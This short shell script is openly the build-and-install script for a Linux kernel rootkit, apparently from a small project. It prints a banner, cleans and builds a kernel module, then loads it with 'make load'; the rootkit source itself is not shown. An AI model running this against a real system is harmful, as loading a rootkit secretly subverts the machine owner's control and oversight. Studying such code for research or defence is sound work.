#!/bin/sh
#
# Copyright (c) 2019 Jasper Lowell
# Copyright (c) 2019 Wesley Hamburger
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#

SRC=$(pwd)/src
KMOD=$SRC/kmod

cat << "EOF"
 _                   _ _____     _____     _____
| |_ ___ ___ ___ ___| |   __|___| __  |_ _| __  |___
| '_| -_|  _|   | -_| |__   |  _|    -| | | __ -|_ -|
|_,_|___|_| |_|_|___|_|_____|___|__|__|___|_____|___|

EOF

cd $KMOD

echo ">> Clean existing build."
make clean

echo ">> Build rootkit."
make

echo ">> Install rootkit kernel module."
make load
